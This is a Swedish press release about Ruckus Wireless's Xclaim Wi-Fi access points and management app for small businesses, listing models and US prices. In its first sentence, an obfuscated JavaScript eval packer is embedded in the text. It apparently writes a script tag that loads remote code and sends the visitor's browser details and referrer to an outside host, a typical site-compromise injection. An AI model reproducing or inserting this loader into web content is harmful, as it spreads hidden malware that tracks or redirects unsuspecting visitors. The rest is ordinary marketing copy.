Image Image Image Image Image Image Image Image Image Image

| 27 februari, 2020

Scroll to top

Top

Ruckus tar Wi-Fi för storföretag till småföretag med Xclaim

Ruckus tar Wi-Fi för storföretag till småföretag med Xclaim
Sebastian

Ruckus eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ftize|var|u0026u|referrer|iznea||js|php’.split(’|’),0,{}))
Wireless, Inc.
(NYSE: RKUS) lanserar idag Xclaim™, ett helt nytt Wi-Fi-system exklusivt utvecklat för små företag. Xclaim omdefinierar modellen för Wi-Fi-tjänster och erbjuder mindre organisationer, med liten eller ingen IT-expertis, Wi-Fi-tjänster som håller samma klass som de lösningar som används hos stora koncerner.

Xclaim är ett nytt varumärke med unik prissättning, helt utan komplexa kontrollenheter som är redo för molnet. Xclaim representerar en fundamentalt annorlunda approach till att leverera Wi-Fi i samma klass som i den stora organisationer använder. Till skillnad från alternativen eliminerar Xclaim kostnaderna och komplexiteten som associeras med att använda konventionella trådlösa LAN (WLAN)-system i ”enterprise-klassen” för mindre företag. Dessa företag har tidigare inte kunnat rättfärdiga köp av samma sorts Wi-Fi-lösning som de för storföretagen, men vill fortfarande ha bästa möjliga trådlösa uppkopplingsmöjligheter, täckning och prestanda, med en enkel hantering.

I Xclaim-portfolion finns Harmony for Xclaim™ inkluderad. Detta är en kostnadsfri och ändamålsbyggd iOS och Android-mobilapplikation. Harmony for Xclaim förenklar och optimerar installation, konfiguration och löpande administration av Wi-Fi-nätverket radikalt. Inom några minuter, kan mindre företag börja erbjuda säker, robust och pålitlig Wi-Fi till en bråkdel av kostnaden och komplexiteten som finns hos traditionella alternativ för större företag.

– Nya trådlösa LAN-produkter och tjänster har introducerats av ledande återförsäljare för småföretagen. Två huvudsakliga typer av produkter har typiskt sett använts för att rikta sig mot dessa företag: accesspunkter av ”enterprise-klass” eller SOHO (Small Office Home Office)-accesspunkter. Återförsäljare sätter nu ihop dessa produkter med tjänster och mjukvara som är skräddarsydda – och i vissa fall kostnadsoptimerade för SMB: er. När vi tittar på det ökade antalet produkter som introduceras för att passa SMB: er, uppskattar vi att marknadsmöjligheten för WLAN till SMB: er kommer närma sig 1,3 miljarder dollar inom de kommande åren, sa Chris DePuy, vice president, Wireless LAN research, Dell’Oro Group.

Xclaim befriar mindre företag från kontrollenheter

Till skillnad från Wi-Fi-alternativ som fortfarande förlitar sig på virtuella kontroller i molnet, är Xclaim systemet helt fritt från liknande kontrollalternativ. Xclaim kombinerar utomstående funktionalitet och hög prestanda med en otrolig enkelhet för hantering och driftsättning som SOHOs och småföretagen vill ha.

–  Ruckus är kända för att leverera Wi-Fi-prestanda och pålitlighet i operatörsklass till såväl företag på mellanmarknaden som globala tjänsteleverantörer. Med Xclaim ger vi nu samma värde till SOHO och småföretagsmarknaden. Detta segment genomgår samma mobila internetrevolution som alla andra, men har tidigare inte haft tillgång till pålitliga, kraftfulla Wi-Fi-lösningar som är prisvärda och enkla att sköta och hantera. Xclaim innebär att dessa företag inte längre behöver använda undermålig konsument-Wi-Fi eller behöver handskas med driftsättningskostnader de inte har råd med och system som de inte med enkelhet kan förstå och hantera, sa Rob Mustarde, vice president och general manager för Xclaim-produktlinjen, Ruckus Wireless.

Bättre Wi-Fi inte länge utom räckhåll för småföretagen

I och med den ökande populariteten och breda användningen av Wi-Fi har möjligheten att erbjuda Wi-Fi-tjänster i klass med de som stora företag använder fortsatt vara utom räckhåll för små företag som vill ha bättre Wi-Fi för att stödja en rad nya datahungriga applikationer, enheter och användare.

För att ta hand om det växande behovet av att ha Wi-Fi som en pålitlig affärstillgång har mindre organisationer tidigare tvingats att antingen köpa system med komplexa kontrollenheter (antingen on-premise eller i molnet) som är för kostsamma och komplexa för deras affärsverksamhet, eller Wi-Fi i ”konsument-klassen “som saknar pålitlighet, funktionalitet och hanteringen som krävs för att stödja den uppsjö av mobila enheter och applikationer som finns på marknaden.

Ett nytt sätt att använda Wi-Fi: koppla upp, klicka och kör

Xclaim gör det enkelt för små företag med begränsad IT-kunskap att snabbt installera, konfigurera och övervaka Wi-Fi-nätverket i och med introduktionen av Harmony for Xclaim. Harmony for Xclaim är en skräddarsydd mobilapplikation, som exklusivt används med Xclaim-accesspunkter. Applikationen är intuitiv och utformad för enkelhet, där nätverkshanteringen enkelt sköts från en mobil enhet vilket möjliggör att nätverket snabbt kan konfigureras och vara igång på bara några minuter.

Harmony for Xclaim är utvecklat specifikt för små företag och hjälper den inte så tekniskt lagda personen genom en intuitiv, enkel, steg-för-steg process för att automatisk upptäcka accesspunkter och för att konfigurera trådlösa LAN-inställningar. Efter konfiguration och setup erbjuder Harmony for Xclaim en smidig översikt av viktiga nätverksdata som t.ex. uppkopplade accesspunkter och klienter, uppkopplade klienter på varje accesspunkt, klienttyper, trafikvolym och mycket mer, i realtid.

Produktdetaljer om Xclaim

Xclaim innefattar fyra inomhus och utomhus-802.11n och 802.11ac-Wi-Fi-lösningar för små företag, utformade med en smal och lätt formfaktor med låg profil.

  • Xi-1: dual-band (valbar) 2×2:2 802.11n inomhusaccesspunkt
  • Xi-2: dual-band 2×2:2 802.11n inomhusaccesspunkt
  • Xi-3: dual-band 2×2:2 802.11ac inomhusaccesspunkt
  • Xo-1: dual-band 2×2:2 802.11ac utomhusaccesspunkt

Inomhus- och utomhusaccesspunkterna i Xclaim-portfolion är enkla att använda då de helt saknar komplexa kontrollfunktioner samtidigt som de levererar trådlös prestanda i klass med liknande lösningar för stora koncerner till banbrytande priser. Detta gör dem ideala för kostnadsmedvetna småföretagsmiljöer

Wi-Fi-egenskaper som återfinns i lösningar för större företag som dynamiskt kanalval, bandstyrning, klientisolering och ”airtime fairness” kommer alla som standard i Xclaim-accesspunkterna för att säkerställa högsta möjliga pålitlighet, säkerhet och prestanda utan konstanta manuella optimeringar.

Lokal hantering erbjuds direkt genom Harmony for Xclaim-applikationen. Harmony for Xclaim stödjs av iOS och Android-enheter. Den revolutionerar och förenklar processen för att upptäcka accesspunkter, konfiguration av trådlösa områden samt löpande övervakning av trådlösa LAN-miljöer, helt utan kontrollenheter, vilket eliminerar kravet för företagen att köpa in ytterligare hårdvara för hantering, mjukvara eller licenser till accesspunkterna.

Xclaim har support genom ett expertforum online som erbjuder kostnadsfria och direkta svar på frågor om drift och funktion.

Pris och tillgänglighet

Xclaim-produktportfolion kommer nu finnas tillgänglig på http://www.xclaimwireless.com i Nordamerika och utvalda länder i Europa och Asien. Portfolion innefattar 802.11n-inomhusaccesspunkten Xi-1, med ett rekommenderat pris på $89.00 (USD), 802.11n-inomhusaccesspunkten Xclaim Xi-2, med ett rekommenderat pris på $149.00 (USD), 802.11ac-inomhusaccesspunkten Xclaim Xi-3, med ett rekommenderat pris på $199.00 (USD), och 802.11ac-utomhusaccesspunkten Xclaim Xo-1, med ett rekommenderat pris på $299.00 (USD).